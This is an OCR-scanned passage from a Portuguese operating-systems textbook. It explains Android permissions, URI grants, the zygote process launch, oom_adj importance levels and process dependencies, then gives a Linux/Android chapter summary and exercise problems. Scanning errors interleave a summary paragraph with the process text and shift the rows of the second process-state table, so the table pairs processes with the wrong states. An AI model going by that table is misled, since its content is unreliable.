Após a usuária ter tirado uma foto, ela pode querer 
enviá-la por e-mail para um amigo. O e-mail é um apli- 
cativo separado, com sua própria caixa de areia, sem 
acesso a fotos na aplicação da câmera. Como pode o 
aplicativo do e-mail conseguir acesso às fotos na caixa 
de areia do aplicativo da câmera? 

A forma mais conhecida de controle de acesso no 
Android são as permissões de aplicação. Permissões são 
capacidades específicas bem definidas que podem ser 


concedidas a um aplicativo no momento da instalação. 
O aplicativo lista as permissões de que ele precisa em 
seu manifesto, e antes de instalar o aplicativo, o usuário 
é informado do que será permitido fazer baseado nelas. 

A Figura 10.63 mostra como nosso aplicativo de e- 
-mail poderia fazer uso das permissões para acessar fo- 
tos no aplicativo da câmera. Nesse caso, o aplicativo da 
câmera tem associado consigo a permissão READ. PIC- 
TURES com suas fotos, dizendo que qualquer aplicativo 
com essa permissão pode acessar seus dados de fotos. O 
aplicativo de e-mail pode agora acessar o URI de pro- 
priedade da câmera como content://pics/1; ao receber a 
solicitação para sua URI, o provedor de conteúdo do 
aplicativo da câmera pergunta ao gerenciador de paco- 
tes se o chamador tem a permissão necessária. Se ele 
tiver, a chamada é bem-sucedida e os dados apropriados 
são retornados à aplicação. 

Permissões não são vinculadas aos provedores de 
conteúdo; qualquer IPC no sistema pode ser protegido 
por uma permissão através do sistema perguntando ao 
gerenciador de pacotes se o chamador tem a permissão 
exigida. Lembre-se de que a proteção com caixas de 
areia de aplicativos é baseada em processos e UIDs, de 
maneira que uma barreira de segurança sempre acontece 
na fronteira de um processo, e as permissões em si são 
associadas com UIDs. Levando-se isso em considera- 
ção, uma conferência de permissão pode ser realizada 
recuperando o UID associado com o IPC que chega e 
perguntando ao gerenciador de pacotes se ao UID foi 
concedida a permissão correspondente. Por exemplo, 
permissões para acessar a localização do usuário são im- 
plementadas pelo serviço do gerenciador de localização 
do sistema quando aplicativos questionam a respeito. 

A Figura 10.64 ilustra o que acontece quando um 
aplicativo não tem uma permissão necessária para uma 
operação que ele está realizando. Aqui o aplicativo do 
navegador está tentando acessar diretamente as fotos 
do usuário, mas a única permissão que ele tem é uma 
para operações em rede pela internet. Nesse caso, o 
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(eU LR] Solicitando e usando uma permissão. 
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PicturesProvider recebe a informação do gerenciador de 
pacotes de que o processo chamador não tem a permis- 
são READ_PICTURES necessária e como consequência 
joga uma SecurityException de volta para ele. 
Permissões proporcionam acesso amplo e irrestrito 
a classes de operações e dados. Elas funcionam quando 
a funcionalidade de uma aplicação é centrada em tor- 
no daquelas operações, como nossa aplicação de e-mail 
exigindo a permissão INTERNET para enviar e receber 
e-mails. No entanto, faz sentido para o aplicativo de e- 
-mail ter uma permissão READ_PICTURES? Não há 
nada a respeito de um aplicativo de e-mail que esteja 
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diretamente relacionado à leitura de fotos, e não há ra- 
zão para um aplicativo de e-mail ter acesso a todas as 
suas fotos. 

Há outra questão relativa a esse uso de permissões, 
que podemos ver ao retornar à Figura 10.55. Lembre-se 
de como podemos lançar a ComposeActivity da apli- 
cação do e-mail para compartilhar uma foto do aplica- 
tivo da câmera. O aplicativo de e-mail recebe um URI 
dos dados a serem compartilhados, mas não sabe de 
onde eles vieram — na figura aqui ele veio da câme- 
ra, mas qualquer outra aplicação poderia usar isso para 
deixar que o usuário enviasse por e-mail seus dados, 


de arquivos de áudio a documentos do editor de texto. 
O aplicativo de e-mail apenas precisa ler o URI como 
um fluxo de bytes para adicioná-lo como um anexo. No 
entanto, com as permissões, ele também teria de especi- 
ficar de antemão as permissões para todos os dados de 
todos os aplicativos de onde ele poderia ser pedido para 
enviar um e-mail. 

Temos dois problemas para resolver. Primeiro, não 
queremos dar aos aplicativos um acesso a grandes quan- 
tidades de dados de que eles não precisam realmente. 
Segundo, eles precisam receber acesso a quaisquer fon- 
tes de dados, mesmo aquelas de que eles a priori não 
têm conhecimento a respeito. 

Há uma observação importante a ser feita: o ato de 
enviar por e-mail uma foto é na realidade uma interação 
do usuário em que este expressou uma clara intenção de 
usar uma foto específica com um aplicativo específico. 
Enquanto o sistema operacional estiver envolvido na in- 
teração, ele pode usar isso para identificar uma brecha 
específica a ser aberta nas caixas de areia entre os dois 
aplicativos, deixando os dados passarem. 

O Android dá suporte a esse tipo de acesso a dados 
seguro através de intentos e provedores de conteúdo. A 
Figura 10.65 ilustra como essa situação funciona para 
nosso exemplo da foto por e-mail. O aplicativo da cá- 
mera no canto inferior esquerdo criou um intento pedin- 
do para compartilhar uma das suas imagens, content:// 
pics/1. Além de iniciar o aplicativo composto de e-mail 
como já tínhamos visto, isso também acrescenta uma 
entrada a uma lista de “URIs concedidas”, observando 
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que o novo ComposeActivity agora tem acesso a esse 
URI. Agora, quando ComposeActivity procura abrir e 
ler os dados do URI que recebeu, o PicturesProvider do 
aplicativo da câmera que é proprietário dos dados por 
trás do URI pode perguntar ao gerenciador de ativida- 
des se o aplicativo de e-mail chamador tem acesso aos 
dados, que ele tem, então a foto é retornada. 

Esse acesso URI de granularidade fina também pode 
operar de outra maneira. Há outra ação de intento, an- 
droid.intent.action.GET. CONTENT, que uma aplicação 
pode usar para pedir ao usuário para escolher alguns da- 
dos e retornar a ele. Isso seria usado no nosso aplicativo 
de e-mail, por exemplo, para operar de maneira con- 
trária: o usuário enquanto no aplicativo de e-mail pode 
pedir para acrescentar um anexo, que lançará uma ativi- 
dade no aplicativo da câmera para ele selecionar uma. 

A Figura 10.66 ilustra esse novo fluxo. Ele é quase 
idêntico à Figura 10.65; a única diferença está na manei- 
ra como as atividades dos dois aplicativos são compos- 
tas, com o aplicativo de e-mail começando a atividade 
de seleção de foto apropriada no aplicativo da câmera. 
Uma vez que a imagem tenha sido selecionada, o seu 
URI é retornado de volta para o aplicativo de e-mail, e 
a essa altura nossa concessão de URI é registrada pelo 
gerenciador de atividades. 

Essa abordagem é extremamente poderosa, pois per- 
mite que o sistema mantenha um controle rígido sobre 
os dados por aplicação, concedendo acesso específico 
a dados onde necessário, sem que o usuário precise ter 
ciência de que isso está acontecendo. Muitas outras 
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interações de usuário também se beneficiam disso. 
Uma interação óbvia é o arrastar e largar para criar uma 
concessão de URI similar, mas o Android também tira 
vantagem de outras informações como o foco da janela 
atual para determinar os tipos de interações que os apli- 
cativos podem ter. 

Um método de segurança final comum que o Android 
usa são interfaces do usuário explícitas para permitir/ 
remover tipos específicos de acesso. Nessa abordagem, 
existe alguma maneira de um aplicativo indicar que ele 
pode opcionalmente fornecer alguma funcionalidade, e 
uma interface do usuário confiável fornecida pelo siste- 
ma que fornece controle sobre esse acesso. 

Um exemplo típico dessa abordagem á a arquitetu- 
ra de métodos de entrada do Android. Um método de 
entrada é um serviço específico fornecido por um apli- 
cativo de terceiros que permite que o usuário forneça 
entrada para aplicativos, em geral na forma de um tecla- 
do na tela. Trata-se de uma interação altamente sensível 
no sistema, já que muitos dados pessoais passarão pelo 
aplicativo do método de entrada, incluindo senhas que 
o usuário digita. 

Um aplicativo indica que ele pode ser um método de 
entrada declarando um serviço em seu manifesto com 
um filtro de intento casando com a ação para o proto- 
colo de método de entrada do sistema. Isso não permite 
automaticamente, no entanto, que ele se torne um mé- 
todo de entrada, e a não ser que algo mais aconteça, a 
caixa de areia do aplicativo não tem a capacidade de 
operar como tal. 


As configurações do sistema Android incluem uma 
interface do usuário para selecionar métodos de entra- 
da. Essa interface mostra todos os métodos de entrada 
disponíveis dos aplicativos atualmente instalados e se 
eles são ou não habilitados. Se o usuário quiser usar um 
novo método de entrada após eles terem instalado seu 
aplicativo, ele deve ir à interface de configurações do 
sistema e habilitá-lo. Quando fizer isso, o sistema pode 
também informar o usuário dos tipos de coisas que isso 
permitirá que o aplicativo faça. 

Mesmo uma vez que um aplicativo tenha sido ha- 
bilitado como um método de entrada, o Android usa as 
técnicas de controle de acesso de granularidade para li- 
mitar o seu impacto. Por exemplo, apenas o aplicativo 
que está sendo usado como o método de entrada atu- 
al pode realmente ter qualquer interação especial; se o 
usuário capacitou múltiplos métodos de entrada (como 
teclado suave e entrada de voz), apenas o que estiver 
atualmente em uso ativo terá essas características em 
sua caixa de areia. Mesmo o método de entrada atual é 
restrito no que ele pode fazer, através de políticas adi- 
cionais como apenas permitir que ele interaja com a ja- 
nela que atualmente tem o foco de entrada. 


10.8.12 Modelo de processos 


O modelo de processos tradicional no Linux é um 
fork para criar um novo processo, seguido por um exec 
para inicializar aquele processo com o código a ser 
executado e então começar a sua própria execução. O 
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shell é responsável por impelir essa execução, criando 
e executando processos conforme a necessidade para 
executar comandos de shell. Quando esses comandos 
terminam, o processo é removido pelo Linux. 

O Android usa processos diferentemente de certa 
maneira. Como discutido na seção anterior sobre aplica- 
tivos, o gerenciador de atividades é a parte do Android 
responsável por gerenciar aplicações em execução. Ele 
coordena lançamentos de novos processos de aplicati- 
vos, determina o que será executado neles e quando eles 
não mais serão necessários. 


Inicializando processos 


A fim de lançar novos processos, o gerenciador de 
atividades deve comunicar-se com o zygote. Quando o 
gerenciador de atividades primeiro começa, ele cria um 
soquete dedicado com zygote, através do qual ele envia 
um comando quando precisa inicializar um processo. O 
comando fundamentalmente descreve a caixa de areia a 
ser criada: o UID que o novo processo deve executar e 
quaisquer outras restrições que se aplicarão a ele. Zygo- 
te então deve executar como um root: quando ele cria, 
ele realiza uma configuração apropriada para o UID que 
ele executará como, por fim, abandonando privilégios 
de root e mudando o processo para o UID desejado. 

Lembre-se de nossa discussão anterior sobre os 
aplicativos do Android que o gerenciador de atividades 
mantém informações dinâmicas a respeito da execução 
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de atividades (na Figura 10.52), serviços (Figura 10.57), 
transmissões (para receptores como na Figura 10.60) e 
provedores de conteúdo (Figura 10.61). Ele usa essas 
informações para impelir a criação e gerenciamento de 
processos de aplicações. Por exemplo, quando o lança- 
dor de aplicações chama o sistema com um novo intento 
de começar uma atividade como vimos na Figura 10.52, 
é o gerenciador de atividades que é o responsável por 
fazer que a nova aplicação execute. 

O fluxo para começar uma atividade em um novo 
processo é mostrado na Figura 10.67. Os detalhes de 
cada passo no exemplo são: 


1. Alguns processos existentes (como o lançador de 
aplicativos) chama o gerenciador de atividades 
com um intento descrevendo a nova atividade 
que ele gostaria de inicializar. 

O gerenciador de atividades pede que o gerencia- 
dor de pacotes resolva o intento para um compo- 
nente explícito. 

O gerenciador de atividades determina que o pro- 
cesso de aplicação não está em execução ainda, e 
então pede a zygote um novo processo com UID 
apropriado. 

O zygote realiza um fork, criando um novo pro- 
cesso, que é um clone de si mesmo, abandona 
privilégios e estabelece seu UID de maneira apro- 
priada para a caixa de areia do aplicativo, e ter- 
mina a inicialização do Dalvik naquele processo 
de maneira que o Java runtime esteja executando 
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plenamente. Por exemplo, ele deve começar threads 
como o coletor de lixo após realizar o fork. 

5. O novo processo, agora um clone de zygote com 
o ambiente Java em plena execução, chama de 
volta o gerenciador de atividades, perguntando 
“O que devo fazer?”. 

6. O gerenciador de atividades retorna a informação 
completa sobre o aplicativo que ele está iniciali- 
zando, como onde encontrar o seu código. 

7. O novo processo carrega o código para a aplica- 
ção começar a executar. 

8. O gerenciador de atividades envia ao novo pro- 
cesso quaisquer operações pendentes, nesse caso 
“iniciar atividade X”. 

9. Onovo processo recebe o comando para começar 
uma atividade, instancia a classe Java apropriada 
e a executa. 


Observe que, quando começamos essa atividade, o 
processo do aplicativo pode já estar executando. Nesse 
caso, o gerenciador de atividades apenas pulará para o 
fim, enviando um novo comando para o processo dizen- 
do a ele para instanciar e executar o componente apro- 
priado. Isso pode resultar em uma instância de atividade 
adicional executando na aplicação, se apropriado, como 
vimos anteriormente na Figura 10.56. 


Ciclo de vida do processo 


O gerenciador de atividades também é responsável 
por determinar quando os processos não são mais ne- 
cessários. Ele controla todas as atividades, receptores, 
serviços e provedores de conteúdo executando em um 
processo; a partir disso ele pode determinar quão impor- 
tante (ou não) o processo é. 

Você se lembra de que o matador de falta de memória 
do Android no núcleo usa um oom adj do processo como 
um ordenamento estrito para determinar quais processos 
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ele deve eliminar primeiro. O gerenciador de atividades 
é o responsável por estabelecer cada oom adj dos pro- 
cessos de maneira apropriada baseado no estado daquele 
processo, classificando-os em grandes categorias de uso. 
A Figura 10.68 mostra as principais categorias, com a 
mais importante primeiro. A última coluna mostra um 
valor de oom ad); típico para processos desse tipo. 

Agora, quando a RAM está ficando baixa, o sistema 
tem configurado os processos de maneira que o mata- 
dor de falta de memória vá primeiro eliminar processo 
na cache a fim de tentar recuperar a RAM suficiente 
necessária, seguido por home, service e assim por dian- 
te. Dentro de um nivel oom adj específico, ele elimi- 
nará processos com a pegada de RAM maior antes dos 
menores. 

Vimos agora como o Android decide quando come- 
çar processos e como ele categoriza esses processos 
em ordem de importância. Agora precisamos decidir 
quando os processos devem sair, certo? Ou realmente 
precisamos fazer algo mais aqui? A resposta é: não. No 
Android, processos de aplicativos nunca saem de ma- 
neira limpa. O sistema simplesmente deixa os proces- 
sos desnecessários por aí, contando com o núcleo para 
ceifá-los conforme a necessidade. 

Processos em cache de muitas maneiras substituem 
o espaço de troca que falta ao Android. À medida que 
a RAM é necessária em outras partes, os processos em 
cache podem ser jogados para fora da RAM ativa. Se 
uma aplicação precisar executá-los outra vez, um novo 
processo pode ser criado, restaurando qualquer estado 
anterior necessário para retorná-lo a como o usuário 
deixou-o da última vez. Em segundo plano, o sistema 
operacional está lançando, eliminando e relançando 
processos conforme a necessidade, de maneira que as 
operações em primeiro plano seguem executando e os 
processos em cache são mantidos enquanto sua RAM 
não é usada de maneira melhor em outra parte. 



































Categoria Descrição oom adj 
SYSTEM Processos do sistema e do daemon -16 
PERSISTENT Processos de aplicação sempre executando —12 
FOREGROUND | Interagindo atualmente com o usuário 0 
VISIBLE Visível para o usuario 1 
PERCEPTIBLE | Algo de que o usuário tem consciência 2 
SERVICE Executando serviços de segundo plano 3 
HOME O processo home/lançador 4 
CACHED Processos não sendo utilizados 5 











Dependências de processos 


A essa altura temos uma boa visão geral de como os 
processos Android individuais são gerenciados. Há uma 
complicação a mais sobre isso, no entanto: as depen- 
dências entre processos. 

Como um exemplo, considere nosso aplicativo da 
câmera mantendo as fotos que foram tiradas. Essas fo- 
tos não fazem parte do sistema operacional; elas são 
implementadas por um provedor de conteúdo no apli- 
cativo da câmera. Outros aplicativos podem querer 
acessar aqueles dados da foto, tornando-se clientes do 
aplicativo da câmera. 

Dependências entre processos podem acontecer 
tanto com provedores de conteúdo (através do simples 
acesso ao provedor) quanto com serviços (ligando a um 
serviço). Em qualquer um dos casos, o sistema opera- 
cional precisa controlar essas dependências e gerenciar 
os processos de maneira apropriada. 

Dependências de processos impactam duas ques- 
tões fundamentais: quando os processos serão criados 
(e os componentes criados dentro deles) e qual será a 
importância do oom adj do processo. Lembre-se de que 
a importância de um processo se encontra em seu com- 
ponente mais importante. A sua importância é também 
aquela do processo mais importante que depende dele. 

Por exemplo, no caso do aplicativo da câmera, o seu 
processo e desse modo o seu provedor de conteúdo não 
está executando normalmente. Ele será criado quando 
algum outro processo precisar acessar aquele provedor 
de conteúdo. Enquanto o provedor de conteúdo da ca- 
mera estiver sendo acessado, o processo da câmera será 
considerado pelo menos tão importante quanto o pro- 
cesso que o está usando. 

A fim de calcular a importância final de cada proces- 
so, O sistema precisa manter um gráfico de dependência 
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entre esses processos. Cada processo tem uma lista de 
todos os serviços e provedores de conteúdo atualmente 
executando nele. Cada serviço e provedor de conteúdo 
em si tem uma lista de cada processo usando-o. (Essas 
listas são mantidas em registros dentro do gerenciador de 
atividades, de maneira que não é possível para as aplica- 
ções mentirem sobre eles.) Passar o gráfico de dependên- 
cia para um processo envolve passar por todos os seus 
provedores de conteúdo e serviços e os processos que os 
estão utilizando. 

A Figura 10.69 ilustra um estado típico em que os pro- 
cessos podem encontrar-se, levando em conta dependên- 
cias entre eles. Esse exemplo contém duas dependências, 
baseadas no uso de um provedor de conteúdo de câmera 
para adicionar um anexo de foto a um e-mail como dis- 
cutido na Figura 10.66. Primeiro, é o aplicativo de e-mail 
em primeiro plano atual que está fazendo uso do aplica- 
tivo da câmera para carregar um anexo. Isso eleva o pro- 
cesso da câmera para o mesmo patamar de importância 
que o aplicativo do e-mail. Segundo, uma situação simi- 
lar em que o aplicativo de música está tocando música ao 
fundo com um serviço e enquanto ele faz isso, ele tem 
uma dependência em relação ao processo de mídia para 
acessar a mídia de música do usuário. 

Considere o que acontece se o estado da Figura 
10.69 muda de tal maneira que o aplicativo de e-mail 
terminou de carregar o anexo, e não usa mais o prove- 
dor de conteúdo da câmera. A Figura 10.70 ilustra como 
o estado do processo vai mudar. Observe que o aplica- 
tivo da câmera não é mais necessário, então ele perdeu 
sua importância de primeiro plano e caiu para o nível de 
cache. Armazenar a câmera em cache também empur- 
rou o antigo aplicativo de mapas um degrau abaixo na 
lista de LRU em cache. 









































Processo Estado Importância 
system (sistema) Parte central do sistema operacional SYSTEM 
phone (telefone) Sempre executando para pilha de telefonia PERSISTENT 
email (e-mail) Aplicação de primeiro plano atual FOREGROUND 
camera (câmera) Em uso por e-mail para anexo de carga FOREGROUND 
music (música) Executando serviço de segundo plano tocando música PERCEPTIBLE 
media (mídia) Em uso por aplicativo de música para acessar a música do usuário PERCEPTIBLE 
download Baixando um arquivo para o usuário SERVICE 
launcher (lançador) Lançador de aplicativo não sendo usado atualmente HOME 
map (mapas) Aplicação de mapeamento usada anteriormente CACHED 
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(eU LBA] Estado do processo após o e-mail parar de usar a câmera. 






































Processo Estado Importância 
system (sistema) Parte central do sistema operacional SYSTEM 
phone (telefone) Sempre executando para pilha de telefonia PERSISTENT 
email (e-mail) Aplicação de primeiro plano atual FOREGROUND 
camera (câmera) Executando serviço de segundo plano tocando música PERCEPTIBLE 
music (música) Em uso por aplicativo de música para acessar a música do usuário PERCEPTIBLE 
media (mídia) Baixando um arquivo para o usuário SERVICE 
download Lançador de aplicativo não sendo usado atualmente HOME 
launcher (lançador) | Previamente usado por e-mail CACHED 
map (mapas) Aplicação de mapeamento usada anteriormente CACHED+1 











Esses dois exemplos proporcionam um exemplo final 
da importância dos processos em cache. Se o aplicativo de 
e-mail precisar usar de novo o provedor de câmera, o pro- 
cesso do provedor tipicamente já terá sido deixado como 


10.9 Resumo 


O Linux começou a sua vida como um sistema de 
código aberto que era um clone do UNIX e hoje é usado 
em máquinas que vão desde smartphones a notebooks, 
passando por supercomputadores. Ele possui três inter- 
faces principais: o shell, a biblioteca C e as chamadas 
de sistema em si. Além disso, uma interface de usuário 
gráfica é usada muitas vezes para simplificar a intera- 
ção do usuário com o sistema. O shell permite que os 
usuários digitem comandos para execução. Esses po- 
dem ser comandos simples, pipelines ou estruturas mais 
complexas. Entrada e saída podem ser redirecionadas. 
A biblioteca C contém as chamadas de sistema e tam- 
bém muitas chamadas incrementadas, como printf para 
escrever saida formatada para arquivos. A interface de 
chamada do sistema real é dependente da arquitetura, e 
nas plataformas x86 consiste em cerca de 250 chama- 
das, cada uma delas faz o que é necessário e nada mais. 

Os conceitos fundamentais no Linux incluem o pro- 
cesso, o modelo de memória, E/S e o sistema de arqui- 
vos. Os processos podem criar subprocessos, levando 
a uma árvore de processos. O gerenciamento de pro- 
cessos no Linux é diferente em comparação com outros 
sistemas UNIX no sentido de que o Linux vê cada enti- 
dade de execução — um processo de um único thread, 
ou cada thread dentro de um processo com múltiplos 
threads ou o núcleo — como uma tarefa distinguível. 
Um processo, ou uma única tarefa em geral, é então 
representado por dois componentes-chave, a estrutura 


um processo em cache. Usá-lo novamente é então apenas 
uma questão de configurar o processo de volta para o pri- 
meiro plano e reconectá-lo ao provedor de conteúdo que 
Já está esperando ali com seu banco de dados inicializado. 


de tarefa e as informações adicionais descrevendo o 
espaço de endereçamento do usuário. O primeiro sem- 
pre está na memória, mas o segundo dado pode ser pa- 
ginado para dentro e para fora da memória. A criação 
de processos é feita duplicando a estrutura de tarefa do 
processo, e então configurando a informação de ima- 
gem de memória para apontar para a imagem de memó- 
ria do processo pai. Cópias reais das páginas de imagem 
de memória são criadas somente se o compartilhamento 
não for permitido e uma modificação de memória for 
exigida. Esse mecanismo é chamado de cópia na escrita. 
O escalonamento é feito usando um algoritmo de fila 
justa ponderada que usa uma árvore rubro-negra para o 
gerenciamento de fila da tarefa. 

O modelo de memória consiste em três segmentos por 
processo: texto, dados e pilha. O gerenciamento de memó- 
ria é feito pela paginação. Um mapa na memória controla 
o estado de cada página, e o daemon da página usa um 
algoritmo de relógio de mão dupla modificado para manter 
um número suficiente de páginas livres à disposição. 

Dispositivos de E/S são acessados usando arquivos 
especiais, cada um tendo um número de dispositivo prin- 
cipal e um número de dispositivo secundário. Os dispo- 
sitivos de bloco de E/S usam a memória principal para 
blocos de disco em cache e reduzem o número de aces- 
sos ao disco. A E/S de caracteres pode ser feita em modo 
bruto, ou fluxos de caracteres podem ser modificados 
através de disciplinas de linha. Dispositivos de rede são 


tratados de modo um pouco diferente, associando módu- 
los inteiros de protocolo de rede para processar o fluxo de 
pacotes de rede para e do processo usuário. 

O sistema de arquivos é hierárquico com arquivos 
e diretórios. Todos os discos são montados em uma 
única árvore de diretórios começando em uma raiz 
única. Arquivos individuais podem ser ligados a um 
diretório de outra parte no sistema de arquivos. Para 
usar um arquivo, ele deve primeiro ser aberto, o que 
resulta em um descritor de arquivos para o uso na lei- 
tura e escrita do arquivo. Internamente, o sistema de 
arquivos usa três tabelas principais: a tabela do des- 
critor de arquivos, a tabela de descrição do arquivo 
aberto e a tabela do i-nodo. A tabela do i-nodo é a mais 
importante dessas, contendo todas as informações ad- 
ministrativas a respeito de um arquivo e a localização 
de seus blocos. Diretórios e dispositivos também são 
representados como arquivos, juntamente com outros 
arquivos especiais. 

A proteção é baseada no controle do acesso à leitura, 
escrita e execução para o proprietário, grupo e outros. 


PROBLEMAS 


1. Explique como escrever UNIX em C facilitou levá-lo 
para novas máquinas. 

2. A interface POSIX define um conjunto de procedimen- 
tos de biblioteca. Explique por que o POSIX padroniza 
os procedimentos de biblioteca em vez da interface de 
chamada de sistema. 

3. O Linux depende do compilador gcc para ser levado 
para novas arquiteturas. Descreva uma vantagem e uma 
desvantagem dessa dependência. 

4. Um diretório contém os seguintes arquivos: 
































aardvark ferret koala porpoise unicorn 
bonefish grunion llama quacker vicuna 
capybara hyena marmot rabbit weasel 
dingo ibex nuthatch seahorse | yak 
emu jellyfish ostrich tuna zebu 





Quais arquivos serão listados pelo comando 
Is [abc]*e*? 
5. O que faz o seguinte pipeline do shell do Linux? 
grep nd xyz | wc — 


6. Escreva um pipeline do Linux que imprima a oitava li- 
nha do arquivo z na saída padrão. 
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Para diretórios, o bit de execução significa permissão 
de busca. 

O Android é uma plataforma para permitir que os 
aplicativos executem em dispositivos móveis. Ele é ba- 
seado no núcleo do Linux, mas consiste em um grande 
corpo de software sobre o Linux, mais um pequeno nú- 
mero de mudanças no núcleo do Linux. A maior par- 
te do Android é escrita em Java. Aplicativos também 
são escritos em Java, então traduzidos para bytecode 
do Java e então para o bytecode do Dalvik. Aplicativos 
Android comunicam-se por uma forma de transações 
chamadas de passagem de mensagens protegidas. Um 
modelo especial do núcleo do Linux chamado Binder 
lida com o IPC. 

Pacotes Android são autocontidos e têm um manifes- 
to descrevendo o que existe no pacote. Pacotes contêm 
atividades, receptores, provedores de conteúdo e inten- 
ções. O modelo de segurança do Android é diferente 
do modelo Linux e se protege cuidadosamente de cada 
aplicativo com caixas de areia, pois todos os aplicativos 
são considerados inconfiáveis. 


7. Por que o Linux faz a distinção entre a saída padrão e o 
erro padrão, quando ambos são padrão para o terminal? 

8. Um usuário em um terminal digita os seguintes 
comandos: 


alblc& 
dlelf& 


Após o shell os ter processado, quantos processos novos 
estão executando? 

9. Quando o shell do Linux inicia um processo, ele coloca 
cópias das suas variáveis de ambiente, como HOME, na 
pilha do processo, de maneira que o processo possa des- 
cobrir qual é o seu diretório home. Se esse processo for 
criar (fork) um processo filho mais tarde, o filho recebe- 
rá automaticamente essas variáveis também? 

10. Cerca de quanto tempo leva para um sistema UNIX tra- 
dicional criar um processo filho nas seguintes condições: 
tamanho do texto = 100 KB, tamanho dos dados = 20 
KB, tamanho da pilha = 10 KB, estrutura da tarefa = 1 
KB, estrutura do usuário = 5 KB. O chaveamento e re- 
torno do núcleo leva 1 ms, e a máquina pode copiar uma 
palavra de 32 bits a cada 50 ns. Segmentos de texto são 
compartilhados, mas os segmentos de dados e pilha não. 

11. À medida que programas multimegabytes tornam-se 
mais comuns, o tempo gasto executando a chamada de 
sistema fork e copiando os segmentos de dados e pi- 
lha do processo chamador cresceu proporcionalmente. 
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Quando fork é executado no Linux, o espaço de ende- 
reçamento do pai não é copiado, como a semântica fork 
tradicional ditaria. Como o Linux evita que o filho faça 
algo que mudaria completamente a semântica fork? 

Por que os argumentos negativos para nice são reserva- 
dos exclusivamente ao superusuário? 

Um processo Linux não em tempo real tem níveis de 
prioridade de 100 a 139. Qual é a prioridade estática pa- 
drão e como o valor nice é usado para mudar isso? 

Faz sentido tomar a memória de um processo quando ele 
entra no estado zumbi? Por quê? 

A qual conceito de hardware um sinal é proximamente rela- 
cionado? Dê dois exemplos de como os sinais são usados. 
Por que você acredita que os projetistas do Linux torna- 
ram impossível para um processo enviar um sinal para 
outro que não esteja em seu grupo do processo? 

Uma chamada de sistema é normalmente implementada 
usando uma instrução de interrupção de software (trap). 
Seria possível usar uma chamada de procedimento ordi- 
nária também em um hardware Pentium? Se afirmativo, 
sob quais condições e como? Se não, por que não? 

Em geral, você acredita que os daemons têm uma priori- 
dade mais alta ou mais baixa do que os processos intera- 
tivos? Por quê? 

Quando um novo processo é criado, ele deve ser desig- 
nado um inteiro único como seu PID. Será suficiente ter 
um contador no núcleo que seja incrementado em cada 
criação de processo com o contador usado como o novo 
PID? Discuta sua resposta. 

Na entrada de cada processo na tabela de processos, o 
PID do pai do processo é armazenado. Por quê? 

O mecanismo cópia na escrita é usado como uma otimi- 
zação na chamada do sistema fork, de maneira que uma 
cópia de uma página é criada somente quando um dos 
processos (pai ou filho) tenta escrever na página. Supo- 
nha que um processo p/ crie os processos p2 e p3 em 
rápida sucessão. Explique como um compartilhamento 
de página pode ser tratado nesse caso. 

Qual combinação dos bits de sharing flags pelo co- 
mando clone do Linux corresponde à chamada fork do 
UNIX? E para criar um thread de UNIX convencional? 
Duas tarefas A e B precisam realizar a mesma quanti- 
dade de trabalho. No entanto, a tarefa A tem uma prio- 
ridade mais alta, precisa receber mais tempo da CPU. 
Explique como isso será conseguido em cada um dos 
escalonadores do Linux descritos neste capítulo, o O(1) 
e o escalonador CFS. 

Alguns sistemas UNIX não marcam o tempo (tickless), 
significando que eles não têm interrupções periódicas de 
relógio. Por que isso é feito? Isso faz sentido em um 
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computador (como um sistema embutido) executando 
apenas um processo? 

Quando inicializando o Linux (ou a maioria dos ou- 
tros sistemas operacionais quanto a isso), o carregador 
de bootstrap no setor 0 do disco primeiro carrega um 
programa de inicialização que então carrega o sistema 
operacional. Por que esse passo extra é necessário? Cer- 
tamente seria mais simples ter o carregador do boots- 
trap no setor O apenas carregando o sistema operacional 
diretamente. 

Um determinado editor tem 100 KB de texto de progra- 
ma, 30 KB de dados inicializados e 50 KB de BSS. A 
pilha inicial tem 10 KB. Suponha que três cópias desse 
editor são inicializadas simultaneamente. Quanta me- 
mória física é necessária (a) se o texto compartilhado for 
usado e (b) se ele não for usado? 

Por que as tabelas de descritores de arquivos abertos são 
necessárias no Linux? 

No Linux, os dados e segmentos de pilha são paginados 
e trocados para uma cópia de rascunho mantida em um 
disco de paginação especial, mas o segmento de texto 
usa o arquivo binário executável em vez disso. Por quê? 
Descreva uma maneira de usar mmap e sinais para 
construir um mecanismo de comunicação interprocesso. 
Um arquivo é mapeado usado a seguinte chamada de 
sistema mmap: 


mmap(65536, 32768, READ, FLAGS, fd, 0) 


As páginas têm 8 KB. Qual byte no arquivo é acessado 
através da leitura de um byte no endereço de memória 
72.000? 

Apos a camada de sistema do problema anterior ter sido 
executada, a chamada 


munmap(65536, 8192) 


é executada. Ela tem sucesso? Se afirmativo, quais 
bytes do arquivo seguem mapeados? Se não, por que ela 
fracassou? 

Pode uma falta de página levar o processo que causou a 
falha a ser terminado? Se afirmativo, dê um exemplo. Se 
não, por que não? 

É possível que com o sistema companheiro de gerencia- 
mento de memória ocorra em um dia que dois blocos ad- 
jacentes de memória livre do mesmo tamanho coexistam 
sem serem fundidos em um bloco? Se afirmativo, expli- 
que como. Se não, demonstre que é algo impossível. 
Foi dito no texto que uma partição de paginação desem- 
penhará melhor do que uma paginação de arquivo. Por 
que isso é assim? 

Dê dois exemplos das vantagens dos nomes de caminhos 
relativos sobre os absolutos. 
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As chamadas de travamento a seguir são feitas por uma 
coleção de processos. Para cada chamada, diga o que 
acontece. Se um processo falhar em conseguir uma tra- 
va, ele é bloqueado. 

(a) A quer uma trava compartilhada nos bytes O ao 10. 
(b) B quer uma trava exclusiva nos bytes 20 a 30. 

(c) C quer uma trava compartilhada nos bytes 8 ao 40. 
(d) A quer uma trava compartilhada nos bytes 25 ao 35. 
(e) B quer uma trava exclusiva no byte 8. 

Considere o arquivo bloqueado da Figura 10.26(c). Su- 
ponha que um processo tente travar os bytes 10 e ll e 
seja bloqueado. Então, antes que C libere a sua trava, 
outro processo ainda tenta travar os bytes 10 e 11, e tam- 
bém é bloqueado. Que tipos de problemas são introduzi- 
dos na semântica por essa situação? Proponha e defenda 
duas soluções. 

Explique em quais situações um processo pode solicitar 
uma trava compartilhada ou uma trava exclusiva. Qual 
problema pode estar sofrendo um processo que solicita 
uma trava exclusiva? 

Se um arquivo do Linux tem o modo de proteção 775 
(octal), o que pode o proprietário, o grupo do proprietá- 
rio e todo mundo mais fazer pelo arquivo? 

Algumas unidades de fita têm blocos numerados e a capaci- 
dade de sobrescrever um bloco particular no seu lugar sem 
perturbar os blocos à frente ou atrás. Poderia um dispositi- 
vo desses conter um sistema de arquivos Linux montado? 

